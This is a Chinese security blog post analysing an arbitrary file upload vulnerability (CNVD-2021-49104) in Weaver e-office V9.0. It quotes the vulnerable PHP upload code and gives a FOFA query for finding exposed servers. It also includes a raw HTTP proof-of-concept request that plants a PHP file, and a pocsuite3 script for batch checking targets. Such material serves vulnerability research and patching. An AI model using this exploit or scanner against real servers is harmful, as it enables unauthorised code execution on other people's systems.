(php)泛微E-Office文件上传漏洞(原理分析+复现+批量检测)

最新推荐文章于 2024-04-23 08:17:43 发布
最新推荐文章于 2024-04-23 08:17:43 发布
阅读量6.5k 收藏 2
点赞数
分类专栏: 代码审计 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38850916/article/details/121696515
版权

漏洞描述

泛微e-office是泛微旗下的一款标准协同移动办公平台。

CNVD-2021-49104

由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。

该漏洞CVSS评分:9.0,危害等级:高危

FOFA 查询

app="泛微-EOffice"

影响范围

影响版本:泛微e-office V9.0

代码分析

出现问题的代码在/general/index/UploadFile.php文件中,具体位置是

if ($uploadType == "eoffice_logo") {
    $targetPath = $_SERVER['DOCUMENT_ROOT'] . "/images/logo/";
    if (!file_exists($targetPath)) {
        mkdir($targetPath, 511, true);
    }
    $ext = $this->getFileExtension($_FILES['Filedata']['name']);
    //将上传的文件尾缀传给变量$ext
    $_targetFile = "logo-eoffice" . $ext;
    //将上传的文件名改为logo-eoffice.$ext
    $targetFile = str_replace("//", "/", $targetPath) . "/" . $_targetFile;
    //将['DOCUMENT_ROOT']/images/logo/logo-eoffice.$ext 中的‘//’替换为'/'
    if (move_uploaded_file($tempFile, $targetFile)) {
        $query = "SELECT * FROM sys_para WHERE PARA_NAME = 'SYS_LOGO'";
        $result = exequery($connection, $query);
        $row = mysql_fetch_array($result);
        $param1 = $param2 = false;
        if (!$row) {
            $query = "INSERT INTO sys_para VALUES('SYS_LOGO','{$_targetFile}')";
            $param1 = exequery($connection, $query);
        } else {
            $query = "UPDATE sys_para SET PARA_VALUE='{$_targetFile}' WHERE PARA_NAME='SYS_LOGO'";
            $param1 = exequery($connection, $query);
        }
        //这段代码就是判断文件是否上传成功,如果成功了就更新数据库中的内容
        $query = "SELECT * FROM sys_para WHERE PARA_NAME = 'SYS_LOGO_TYPE'";
        $result = exequery($connection, $query);
        $row = mysql_fetch_array($result);
        if (!$row) {
            $query = "INSERT INTO sys_para VALUES('SYS_LOGO_TYPE','2')";
            $param2 = exequery($connection, $query);
        } else {
            $query = "UPDATE sys_para SET PARA_VALUE='2' WHERE PARA_NAME='SYS_LOGO_TYPE'";
            $param2 = exequery($connection, $query);
        }
        if ($param1 && $param2) {
            echo $_targetFile;
            //上传成功后就输出文件名
        } else {
            echo 0;
        }
    } else {
        echo 0;
    }
}

漏洞分析

如上面代码所示,代码并没有对传入的文件进行过滤,如果我们传入一个php文件,那么传入的test.php就会变成logo-eoffice.php,并且传入到$_SERVER['DOCUMENT_ROOT']/images/logo目录下

POC

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: url:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: LOGIN_LANG=cn; PHPSESSID=74c67d4ff7f3e45061684cba5a55c63b
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
Content-Length: 192

--123123
Content-Disposition: form-data; name="Filedata"; filename="1.php"
Content-Type: image/jpeg

<?php 
phpinfo();
?>

--123123--

pocsuite

# -*- coding:utf-8 -*-
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from urllib.parse import urljoin
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = "CNVD-2021-49104"
    version ='泛微 e-office v9.0'
    author = ["HADESI"]
    vulDate = "2020-12-15"
    createDate = "2021-11-30"
    updateDate = "2021-11-30"
    references =["https://nosec.org/home/detail/4910.html"]
    name ="泛微E-Office文件上传漏洞(CNVD-2021-49104)"
    appPowerLink = ''
    appName = '泛微E-Office'
    appVersion = 'v9.0'
    vulType = 'VUL_TYPE.UPLOAD_FILES '
    desc = '''
    泛微E-Office文件上传漏洞
    '''
    samples = []
    install_requires = ['']

    def _verify(self):
        result ={}
        path ="/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId="
        headers={'Content-Type': 'multipart/form-data; boundary=123123'}
        url = urljoin(self.url, path)
        data='''
--123123
Content-Disposition: form-data; name="Filedata"; filename="1.php"
Content-Type: image/jpeg

<?php 
phpinfo();
?>

--123123--'''
        try:
            rr = requests.post(url=url,headers=headers,data=data,timeout=5)
            resq_results=requests.get(url=self.url+'/images/logo/logo-eoffice.php')
            if "System" in resq_results.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['path'] = self.url+'/images/logo/logo-eoffice.php'
                #result['VerifyInfo']['Name'] = payload
        except Exception as e:
            pass
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        return self._verify()
register_poc(DemoPOC)

Le叶a子f
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
漏洞复现】CERIO DT系列路由器 远程代码执行漏洞
qq_67810151的博客
03-13 410
CERIO DT系列路由器在特定版本中存在操作命令注入漏洞。未授权的攻击者可利用该漏洞进行远程代码执行,从而控制服务器。
泛微 E-Office文件上传漏洞复现(CVE-2023-2523、CVE-2023-2648)
热门推荐
0xSec
05-23 1万+
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 9.5版本,源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。参数 upload_quwan 的操作导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。
泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)
Ms08067安全实验室
12-14 6045
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web漏洞挖掘班讲师)参考:https://cnvd.org.cn/flaw/show/CNVD-2021-49104 ...
漏洞复现泛微E-Office uploadfile.php 任意文件上传漏洞
qq_34780861的博客
04-23 262
在/general/index/UploadFile.php中上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限。
泛微e-office系统敏感信息泄露漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
02-24 526
泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。
泛微E-Office敏感信息泄露和未授权访问漏洞
08-03 1681
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
泛微 E-Office 任意文件上传漏洞 CVE-2023-2648(漏洞复现
LHBD_R的博客
06-21 2827
漏洞介绍:泛微 E-Office 9.5版本中文件上传处理程序接口uploadify.php参数Filedata的操作导致任意文件上传,攻击者可以通过远程控制接口上传恶意文件
泛微E-Office10远程代码执行漏洞
最新发布
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
泛微e-office短信插件_泛微短信接口开发_e-office短信发送设置
02-11
泛微e-office短信插件设置指南 在泛微e-office V10.0版本中,设置短信发送功能需要通过泛微短信接口进行开发。下面将详细介绍泛微e-office短信插件的设置步骤和泛微短信接口的开发过程。 一、泛微e-office短信插件...
泛微e-office10to11升级包(适用10.0-20221012)
12-20
泛微协同办公平台e-office10 to e-office11升级包(适用10.0_20221012) 版本: 11.0_2022 发布日期: 2022-11-22 适合升级版本: 10.0_20221012版 注意事项: 1.标准升级程序包,不适用于做过二次开发的10.0系统,...
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
03-02
最新泛微E-office10.5 泛微Eoffice V10.5 泛微E-office10.0 Eoffice10.0 泛微E-offic95 泛微Eoffice9.0 8.0 泛微行政事业V10.0-附件资源
泛微e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本
09-26
对2019年9月新爆的泛微e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。 使用方法: 1、运行url存活检测脚本e-cology_OA_rce.py批量定位泛微OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断是否可以拿权限。oa_check.py http://ip:port whoami
e-office企业办公系统
08-16
e-office企业办公系统  
泛微OA协同办公平台E-office7.8 含注册机
01-11
泛微OA协同办公平台 E-office7.8 含注册机==完美无限制 OA办公平台
泛微e-officev10.0_20220809标准补丁(适用于v10.0_20180119及以上版本)
08-26
版本: 10.0_20220809 发布日期: 2022-08-10 适合升级版本: 10.0_20180119版 说明: 补丁包是累计的,故20220809版本包含历史补丁包内容。 安装注意事项 *************必须执行备份后才允许安装补丁*************...
泛微e-office系统存在敏感信息泄露 附POC软件
nnn2188185的博客
02-21 206
泛微e-office系统存在敏感信息泄露
泛微最近的漏洞利用工具
weixin_46211944的博客
08-03 470
WorkflowServiceXml 内存马注入、uploaderOperate文件上传漏洞、DeleteUserRequestInfoByXml 、FileDownloadForOutDocSQL注入、E-Mobile 6.0 命令执行漏洞检测。集成了QVD-2023-5012、CVE-2023-2523、CVE-2023-2648、getloginid_ofsLogin 漏洞利用。免责声明:本工具不得用于商业用途,仅做学习交流,如用作他途造成的一切后果请自行承担!泛微最近的漏洞利用工具。
CNVD-2021-49104漏洞复现泛微E-Office文件上传漏洞
dreamthe的博客
12-05 2608
1.靶场搭建 自己下载的e-office软件运行就行了
漏洞复现】E-office文件包含漏洞
失心少年
09-07 1402
利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!泛微 E-Office 是一款标准化的协同 OA 办公软件,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。该漏洞是由于存在文件包含的危险函数可直接被利用,攻击者可利用该漏洞在未授权的情况下,构造含有恶意数据的文件,通过该漏洞对文件包含后,最终可获取服务器最高权限。POC (GET) 漏洞复现,文件包含一句话。
泛微 e-cology 前台文件上传漏洞
07-28
泛微e-cology前台文件上传漏洞是指在泛微e-cology系统的前台功能中存在漏洞,攻击者可以利用该漏洞上传恶意文件到服务器上。根据引用\[1\]中提到的CNVD-2020-33199漏洞编号,该漏洞可能存在于泛微e-cology9版本的前台文件上传功能中。具体触发点位于文件/global_search.php的第108行,调用了doc2text()函数,并追溯到doc2txt()函数中的$FILE_PATH参数的源代码。该参数连接了附件目录(C:\eoffice9\webroot\ATTACHMENT)的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值,以获取完整的文件路径。\[2\] 需要注意的是,根据引用\[3\]中的声明,本文提供的信息仅供网络安全人员参考,未经授权请勿利用文章中的技术资料进行任何入侵操作。同时,禁止将本文提供的工具用于其他目的。 #### 引用[.reference_title] - *1* [泛微e-cology9前台文件上传漏洞复现](https://blog.csdn.net/qq_41490561/article/details/116119845)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [泛微E-Office前台文件上传漏洞](https://blog.csdn.net/u010025272/article/details/131312528)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值